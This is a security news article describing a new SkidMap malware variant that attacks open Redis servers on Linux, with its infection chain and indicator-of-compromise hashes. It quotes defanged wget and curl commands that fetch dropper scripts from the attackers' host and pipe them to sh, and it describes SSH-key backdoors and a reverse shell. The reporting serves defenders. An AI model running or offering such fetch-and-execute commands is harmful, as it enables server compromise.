Sunday, May 19, 2024

New SkidMap Malware Attacking Wide Range of Linux Distributions

According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.

Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.

However, this malware’s recent version seems quite sophisticated and targets only open Redis instances. 

SkidMap Malware Attacking Linux

Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.

SkidMap Malware design (Source: Trustwave)

Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.

Base64 encoded cron tasks set up with the variable “SET” (Source: Trustwave)

The dropper scripts are used to download an executable binary file (ELF) ‘gif’ (previous version used ‘jpeg’) to the ‘/var/lib/’ directory, which is the trojan file.

This trojan initially adds some SSH keys in the standard locations ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’. This is done to leave a backdoor for threat actors to login to the system.

Further actions include checking the status of SElinux (Security-Enhanced Linux) module, which is used to implement access control security policies and disable it permanently. After this, the trojan is made permanent by making specific modifications on the host OS.

The trojan creates a reverse shell to the C2 server of the attackers every hour through the TCP/8443 port. The gif binary is found to be targeting linux distributions like Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.

A complete report has been published by Trustwave, which provides a complete explanation on the threat actors’ tactics, methods, source code, and other analysis.

Indicators of Compromise

File Name Hash Type Hashes 
b, c, f MD5 000916c60b2ab828ba8cea914c308999 
SHA1 9970809e1dedce286888f7d25790b4dcca1e704b
SHA256 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 
gif MD5 e23b3c7eb5d68e3cd43e9e61a3055fe8 
SHA1 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd 
SHA256 f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 
jpeg  MD5e23b3c7eb5d68e3cd43e9e61a3055fe8
SHA1940f45f8a5dfb16281a35cd8303cd98c1ab1fabd
SHA256f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367
.miner MD5 44de739950eb4a8a3552b4e1987e8ec2 
SHA1 0ae049aab363fb8d2e164150dffbafd332725e00 
SHA256 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 

Keep informed about the latest Cyber Security News by following us on GoogleNewsLinkedinTwitter, and Facebook.

Website

Latest articles

Hackers Exploiting Docusign With Phishing Attack To Steal Credentials

Hackers prefer phishing as it exploits human vulnerabilities rather than technical flaws which make...

Norway Recommends Replacing SSLVPN/WebVPN to Stop Cyber Attacks

A very important message from the Norwegian National Cyber Security Centre (NCSC) says that...

New Linux Backdoor Attacking Linux Users Via Installation Packages

Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices,...

ViperSoftX Malware Uses Deep Learning Model To Execute Commands

ViperSoftX malware, known for stealing cryptocurrency information, now leverages Tesseract, an open-source OCR engine,...

Santander Data Breach: Hackers Accessed Company Database

Santander has confirmed that there was a major data breach that affected its workers...

U.S. Govt Announces Rewards up to $5 Million for North Korean IT Workers

The U.S. government has offered a prize of up to $5 million for information...

Russian APT Hackers Attacking Critical Infrastructure

Russia leverages a mix of state-backed Advanced Persistent Threat (APT) groups and financially motivated...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles